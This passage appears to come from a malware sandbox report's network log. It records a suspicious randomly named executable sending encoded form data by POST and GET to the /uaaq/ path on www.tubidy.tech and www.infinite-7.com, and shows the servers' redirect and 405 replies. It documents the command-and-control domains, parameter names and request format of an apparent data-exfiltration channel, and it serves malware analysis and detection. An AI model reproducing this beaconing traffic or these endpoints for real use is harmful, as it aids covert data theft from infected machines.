                                                                                    Data Raw: 39 70 47 30 4c 3d 7a 64 6a 45 64 41 74 4d 5a 49 68 6d 74 72 4e 62 6b 6d 62 52 7a 32 6f 2f 61 74 70 57 64 63 38 38 48 62 59 53 64 58 66 4e 2f 66 68 69 38 51 53 42 63 52 43 31 56 79 54 59 5a 35 77 73 65 63 59 4b 65 38 4f 4a 6b 55 51 6b 47 51 73 2f 70 74 79 41 33 6e 6c 53 33 71 54 7a 56 59 54 66 6c 4f 44 62 70 6f 45 33 32 4c 57 69 67 77 56 59 76 36 72 4d 38 42 50 68 69 71 6b 63 42 52 32 6a 4d 71 57 4d 61 61 56 4c 72 71 55 31 57 71 4f 57 79 38 6c 58 51 31 37 4a 55 32 2f 4f 4d 55 73 43 69 59 59 58 4f 6b 6c 63 59 4d 41 73 68 4d 41 74 34 45 4e 39 42 41 3d 3d
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtrNbkmbRz2o/atpWdc88HbYSdXfN/fhi8QSBcRC1VyTYZ5wsecYKe8OJkUQkGQs/ptyA3nlS3qTzVYTflODbpoE32LWigwVYv6rM8BPhiqkcBR2jMqWMaaVLrqU1WqOWy8lXQ17JU2/OMUsCiYYXOklcYMAshMAt4EN9BA==
                                                                                    Dec 4, 2023 12:09:09.129849911 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:09 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    67192.168.11.3049827146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:11.648499966 CET709OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 7a 64 6a 45 64 41 74 4d 5a 49 68 6d 74 4b 64 62 6d 48 62 52 34 32 6f 38 51 4e 70 57 55 38 38 34 48 62 55 53 64 56 7a 6a 2b 74 46 69 39 31 32 42 64 54 36 31 57 79 54 59 53 5a 78 6e 41 73 59 46 65 38 54 71 6b 56 38 6b 47 51 49 2f 70 76 61 41 33 51 35 54 34 61 54 4c 64 34 54 64 36 65 44 62 70 6f 45 33 32 4c 43 4d 67 77 64 59 76 4b 37 4d 2f 6b 6a 69 39 61 6b 64 45 68 32 6a 48 4b 57 32 61 61 56 54 72 76 4d 50 57 6f 47 57 79 39 31 58 51 6b 37 4b 64 32 2f 55 43 30 74 4c 74 49 4a 36 48 33 41 41 59 63 41 75 6d 5a 70 74 39 52 68 75 47 77 4d 37 59 54 4e 47 62 6b 75 4f 66 35 56 62 73 4b 75 55 76 5a 6f 3d
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtKdbmHbR42o8QNpWU884HbUSdVzj+tFi912BdT61WyTYSZxnAsYFe8TqkV8kGQI/pvaA3Q5T4aTLd4Td6eDbpoE32LCMgwdYvK7M/kji9akdEh2jHKW2aaVTrvMPWoGWy91XQk7Kd2/UC0tLtIJ6H3AAYcAumZpt9RhuGwM7YTNGbkuOf5VbsKuUvZo=
                                                                                    Dec 4, 2023 12:09:11.770648956 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:11 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    68192.168.11.3049828146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:14.291930914 CET1626OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 7a 64 6a 45 64 41 74 4d 5a 49 68 6d 74 4b 64 62 6d 48 62 52 34 32 6f 38 51 4e 70 57 55 38 38 34 48 62 55 53 64 56 7a 6a 2b 74 4e 69 39 48 2b 42 63 79 36 31 58 79 54 59 62 35 78 6b 41 73 59 63 65 38 4b 6a 6b 55 41 65 47 53 41 2f 6f 4f 36 41 2b 43 52 54 76 71 54 4c 52 59 54 59 6c 4f 43 52 70 6f 30 37 32 4c 53 4d 67 77 64 59 76 49 7a 4d 6f 68 50 69 75 4b 6b 63 42 52 32 56 4d 71 58 34 61 62 78 70 72 72 51 66 58 5a 6d 57 38 38 46 58 57 57 54 4b 46 6d 2f 4b 50 55 74 54 74 49 46 35 48 33 64 35 59 63 46 4c 6d 65 6c 74 74 47 45 57 58 42 6b 79 4f 6c 4a 34 64 67 2b 56 54 4f 68 2b 2f 61 69 7a 35 4f 51 43 37 4b 2f 30 73 41 56 35 52 74 42 6d 37 49 77 62 52 6e 4b 63 7a 66 4d 73 4b 51 32 4b 6a 59 37 59 53 58 50 64 4e 67 6b 30 64 31 78 67 68 36 35 4a 39 30 71 30 58 48 6c 68 37 38 56 4e 50 62 71 76 6a 7a 62 31 62 4e 46 68 6a 56 4b 48 64 74 43 44 52 74 52 64 31 52 51 42 67 50 4f 32 7a 51 5a 4f 32 62 49 30 67 70 6c 68 38 61 67 61 30 43 64 33 50 37 6f 52 63 2f 6d 50 4b 71 59 6a 34 34 4b 44 33 48 50 32 61 73 37 63 55 44 4f 76 7a 31 70 61 6d 6a 4d 4f 71 62 49 35 4b 55 58 7a 69 2f 6b 4e 72 63 62 78 52 71 75 70 46 53 50 33 36 65 6a 38 34 41 54 4a 33 39 44 58 64 46 58 59 44 42 4e 7a 4b 50 53 45 30 61 36 41 50 76 36 71 32 5a 47 49 73 52 73 4f 31 33 57 64 33 78 2b 55 38 75 63 57 78 6f 33 31 52 59 70 54 70 7a 50 31 45 35 32 34 64 33 66 65 46 66 62 30 33 34 34 63 39 70 64 64 4f 4d 75 73 34 36 65 69 68 6a 4d 49 56 4f 4f 71 32 42 34 75 6e 6b 4c 70 59 35 4e 41 30 53 4b 46 6b 35 4b 6d 4c 72 79 47 70 4c 61 6e 62 35 35 46 30 45 2b 73 71 46 55 76 4c 67 78 55 37 66 4c 41 4e 75 39 70 65 79 61 6f 78 4b 70 4e 4c 49 79 48 47 70 6f 6f 39 31 65 71 56 30 38 57 61 64 72 5a 39 2f 55 34 6e 54 4f 6b 4c 39 51 6b 70 34 39 34 2f 52 47 71 37 67 7a 38 76 68 4a 70 66 30 45 72 35 64 4f 35 76 37 67 31 59 4e 41 5a 30 6d 4b 75 45 47 58 6f 56 6c 76 53 37 39 4f 6c 35 65 34 4b 6f 4c 71 7a 56 74 33 45 35 4d 4f 4f 75 77 6d 45 48 67 4e 47 78 68 4c 4f 45 42 6a 65 55 67 74 33 75 49 4a 58 4a 78 66 46 37 57 52 51 38 78 72 73 52 4f 48 66 34 53 42 45 4f 4b 75 58 74 6e 50 52 77 54 4d 37 75 4d 30 64 71 62 45 4a 4a 7a 79 69 79 4c 35 51 30 47 35 51 6b 74 69 5a 68 56 77 72 71 55 55 74 4f 68 4d 66 67 57 66 64 33 73 51 5a 59 34 76 42 63 41 4e 47 67 75 58 31 63 71 53 71 66 79 31 58 79 4c 64 5a 37 58 4c 33 32 54 2f 78 5a 4e 43 39 6f 7a 30 64 70 38 61 76 66 51 50 78 46 34 4a 55 31 7a 37 62 72 62 7a 4c 4a 62 4d 2b 4b 66 54 36 30 5a 34 76 4a 38 4b 32 75 44 65 43 57 67 46 67 41 6d 55 58 34 6c 46 49 78 6c 76 52 73 49 31 62 6d 43 37 52 2f 36 56 4b 66 43 37 49 56 4d 72 53 57 4f 4c 34 42 56 48 6d 66 50 71 46 64 61 35 6e 69 48 65 6b 55 4e 38 39 30 48 4c 6d 55 58 50 2b 6a 48 42 42 6c 41 62 39 56 6b 35 61 33 49 54 56 47 4d 61 2f 67 52 79 56 62 51 5a 4b 46 33 6c 4c 38 7a 4e 67 4a 6c 78 35 70 59 51 76 33 56 6f 65 4e 37 66 38 74 6c 38 31 48 2f 36 35 59 45 51 35 36 7a 77 7a 69 6e 78 4e 78 65 6f 63 78 70 44 4c 62 58 56 75 68 44 67 73 42 75 69 48 35 78 6a 51 72 39 50 43 4c 62 36 6e 50 43 74 61 50 6e 79 36 46 4b 61 4d 4f 6a 2f 45 76 61 54 48 50 35 32 58 55 34 4a 2f 5a 53 70 43 79 4c 70 52 61 47 50 31 32 43 6b 67 6e 51 75 62 71 4e 61 4a 68 30 58 55 58 47 7a 58 6f 6a 36 36 4a 47 48 77 70 32 33 56 4d 56 38 4c 65 48 69 48 61 4f 43 6d 69 56 6a 62 4d 6a 75 37 32 71 76 55 53 7a 4b 4b 74 32 70 65 6d 32 77 5a 56 56 67 57 63 44 72 54 2b 6d 37 52 46 54 74 76 62 53 46 6d 4e 69 69 2b 75 63 33 30
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtKdbmHbR42o8QNpWU884HbUSdVzj+tNi9H+Bcy61XyTYb5xkAsYce8KjkUAeGSA/oO6A+CRTvqTLRYTYlOCRpo072LSMgwdYvIzMohPiuKkcBR2VMqX4abxprrQfXZmW88FXWWTKFm/KPUtTtIF5H3d5YcFLmelttGEWXBkyOlJ4dg+VTOh+/aiz5OQC7K/0sAV5RtBm7IwbRnKczfMsKQ2KjY7YSXPdNgk0d1xgh65J90q0XHlh78VNPbqvjzb1bNFhjVKHdtCDRtRd1RQBgPO2zQZO2bI0gplh8aga0Cd3P7oRc/mPKqYj44KD3HP2as7cUDOvz1pamjMOqbI5KUXzi/kNrcbxRqupFSP36ej84ATJ39DXdFXYDBNzKPSE0a6APv6q2ZGIsRsO13Wd3x+U8ucWxo31RYpTpzP1E524d3feFfb0344c9pddOMus46eihjMIVOOq2B4unkLpY5NA0SKFk5KmLryGpLanb55F0E+sqFUvLgxU7fLANu9peyaoxKpNLIyHGpoo91eqV08WadrZ9/U4nTOkL9Qkp494/RGq7gz8vhJpf0Er5dO5v7g1YNAZ0mKuEGXoVlvS79Ol5e4KoLqzVt3E5MOOuwmEHgNGxhLOEBjeUgt3uIJXJxfF7WRQ8xrsROHf4SBEOKuXtnPRwTM7uM0dqbEJJzyiyL5Q0G5QktiZhVwrqUUtOhMfgWfd3sQZY4vBcANGguX1cqSqfy1XyLdZ7XL32T/xZNC9oz0dp8avfQPxF4JU1z7brbzLJbM+KfT60Z4vJ8K2uDeCWgFgAmUX4lFIxlvRsI1bmC7R/6VKfC7IVMrSWOL4BVHmfPqFda5niHekUN890HLmUXP+jHBBlAb9Vk5a3ITVGMa/gRyVbQZKF3lL8zNgJlx5pYQv3VoeN7f8tl81H/65YEQ56zwzinxNxeocxpDLbXVuhDgsBuiH5xjQr9PCLb6nPCtaPny6FKaMOj/EvaTHP52XU4J/ZSpCyLpRaGP12CkgnQubqNaJh0XUXGzXoj66JGHwp23VMV8LeHiHaOCmiVjbMju72qvUSzKKt2pem2wZVVgWcDrT+m7RFTtvbSFmNii+uc30
                                                                                    Dec 4, 2023 12:09:14.415582895 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:14 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    69192.168.11.3049829146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:16.945385933 CET423OUTGET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:17.068785906 CET232INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:17 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    70192.168.11.304983091.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:22.254057884 CET698OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4f 6f 4e 6b 33 6c 63 79 54 45 42 74 67 34 79 63 6e 72 68 59 41 54 33 5a 57 6d 33 7a 73 48 45 77 66 32 31 74 75 30 77 72 51 49 2b 6b 63 59 62 38 66 31 6f 64 4f 78 35 53 31 4d 49 7a 42 36 57 46 49 2f 43 2f 59 75 6f 36 2b 43 33 72 43 59 31 5a 30 78 67 55 2b 62 4d 74 64 2f 63 33 70 38 59 4b 43 46 7a 32 4f 43 57 36 34 74 6d 35 2b 68 6f 70 4a 64 72 77 72 61 6a 4a 49 6f 35 36 73 55 75 65 74 69 55 78 68 6f 49 62 46 50 35 58 64 72 37 6e 77 69 6c 47 39 44 34 61 75 52 34 4b 69 45 75 67 71 33 51 76 79 55 76 4a 58 4b 6e 70 34 7a 38 70 67 3d 3d
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtg4ycnrhYAT3ZWm3zsHEwf21tu0wrQI+kcYb8f1odOx5S1MIzB6WFI/C/Yuo6+C3rCY1Z0xgU+bMtd/c3p8YKCFz2OCW64tm5+hopJdrwrajJIo56sUuetiUxhoIbFP5Xdr7nwilG9D4auR4KiEugq3QvyUvJXKnp4z8pg==
                                                                                    Dec 4, 2023 12:09:22.436762094 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:22 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    71192.168.11.304983191.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:24.957211971 CET718OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4f 6f 4e 6b 33 6c 63 79 54 45 42 74 41 49 79 61 30 54 68 51 41 54 77 57 32 6d 33 35 4d 47 73 77 66 71 31 74 76 67 67 72 6c 59 2b 6b 38 6f 62 37 75 31 6f 51 75 78 35 64 56 4d 4e 39 68 36 4e 46 49 6a 77 2f 59 53 6f 36 2b 47 33 72 44 6f 31 5a 48 5a 6a 47 65 62 4f 72 64 2f 61 30 5a 38 59 4b 43 46 7a 32 4b 76 42 36 34 31 6d 36 4f 52 6f 72 6f 64 6f 73 37 61 6b 66 34 6f 35 72 38 56 47 65 74 69 36 78 67 30 75 62 41 4c 35 58 66 6a 37 6e 69 4b 69 52 4e 44 36 58 4f 51 77 63 6e 70 51 75 4c 7a 73 68 43 34 30 59 46 33 73 68 4e 66 76 75 57 65 55 52 6b 50 44 6e 57 75 74 54 41 56 4c 56 64 35 41 61 57 77 3d
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtAIya0ThQATwW2m35MGswfq1tvggrlY+k8ob7u1oQux5dVMN9h6NFIjw/YSo6+G3rDo1ZHZjGebOrd/a0Z8YKCFz2KvB641m6ORorodos7akf4o5r8VGeti6xg0ubAL5Xfj7niKiRND6XOQwcnpQuLzshC40YF3shNfvuWeURkPDnWutTAVLVd5AaWw=
                                                                                    Dec 4, 2023 12:09:25.140680075 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:25 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    72192.168.11.304983291.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:27.659082890 CET1635OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4f 6f 4e 6b 33 6c 63 79 54 45 42 74 41 49 79 61 30 54 68 51 41 54 77 57 32 6d 33 35 4d 47 73 77 66 71 31 74 76 67 67 72 6c 51 2b 6b 74 49 62 38 35 4a 6f 52 75 78 35 44 6c 4d 4d 39 68 37 64 46 49 36 35 2f 59 66 56 36 38 75 33 72 68 51 31 66 32 5a 6a 4e 65 62 4f 70 64 2f 62 33 70 39 61 4b 42 39 33 32 4f 50 42 36 34 31 6d 36 49 64 6f 76 35 64 6f 2f 4c 61 6a 4a 49 6f 6c 36 73 56 39 65 73 4b 4d 78 6a 5a 56 61 30 2f 35 5a 66 54 37 30 42 69 69 4e 64 44 6b 62 75 52 32 63 6e 74 31 75 49 48 47 68 42 6b 4b 59 43 62 73 6a 72 2b 62 31 6c 36 63 4e 47 4b 35 71 33 57 2f 59 56 55 4b 49 2f 56 59 48 57 57 46 5a 48 6b 6f 2b 46 4e 66 32 63 63 41 79 37 2f 5a 32 31 77 32 53 32 6f 6e 43 77 76 36 2b 30 4c 62 55 2f 7a 52 68 45 51 74 4f 66 37 47 4c 70 4e 4d 59 62 4d 63 37 6a 61 58 43 70 62 49 4a 6d 34 46 58 7a 62 38 49 36 61 66 53 67 64 44 4c 51 74 75 6c 59 77 53 65 6d 6a 57 36 73 45 65 53 56 58 4e 61 72 5a 63 62 7a 6c 54 7a 41 61 62 6b 78 2b 75 38 35 53 53 59 59 65 78 4a 73 49 43 6d 47 79 2b 58 4e 76 47 61 76 2f 76 57 6b 36 42 4a 6b 51 68 56 49 48 4f 56 53 72 58 66 4e 6a 6e 45 72 34 57 55 73 58 75 48 33 4a 51 75 54 54 6a 55 6c 58 6b 4d 50 62 35 52 5a 43 36 4f 2b 2b 57 36 51 54 54 55 49 61 79 5a 52 48 49 70 6f 38 70 43 61 39 6d 58 73 55 59 55 67 6b 59 7a 69 53 6e 42 4a 38 4a 6e 70 4f 2f 70 35 70 4a 44 76 34 34 35 5a 55 4d 4a 31 50 30 52 43 76 45 5a 35 4e 42 53 2b 65 2b 63 37 4e 55 7a 4d 6f 59 46 53 47 2b 2f 42 4b 58 53 44 52 56 74 71 65 69 78 75 59 49 4b 55 72 4e 58 51 59 4b 67 6d 43 46 74 59 4e 2f 45 75 71 66 4d 62 72 59 5a 66 35 30 59 66 35 4d 68 6c 4d 69 6f 4e 34 42 53 65 54 34 30 6e 47 6d 32 56 72 61 2f 4a 49 4f 35 68 53 58 66 4f 52 53 52 42 54 45 4a 47 67 79 67 73 5a 4a 6f 53 44 66 76 37 77 48 4d 57 57 55 56 2b 33 76 41 51 52 56 4e 41 4b 57 61 65 74 46 71 2b 6c 55 63 64 55 56 67 6f 4f 6f 49 37 52 7a 66 64 75 61 51 72 74 56 56 4a 45 75 62 51 32 47 53 5a 41 64 55 73 39 75 2b 56 74 64 6e 2b 65 48 36 55 54 39 52 72 62 48 68 79 61 53 6f 79 74 77 4e 37 78 58 2b 68 65 50 53 74 58 54 4e 7a 72 4a 41 63 61 55 59 4b 33 61 33 39 6d 47 77 4d 30 39 51 4e 5a 42 6c 39 64 52 6a 79 50 38 48 4f 52 67 38 75 2f 65 4d 43 6e 51 65 59 49 30 68 58 39 39 71 77 6f 50 2b 4a 5a 6b 30 2b 33 47 31 48 57 77 54 71 4c 34 66 64 61 6f 46 4e 36 50 4c 31 48 64 65 72 4b 51 47 7a 74 78 69 74 64 70 58 2f 73 4e 51 52 45 33 75 39 55 53 78 79 7a 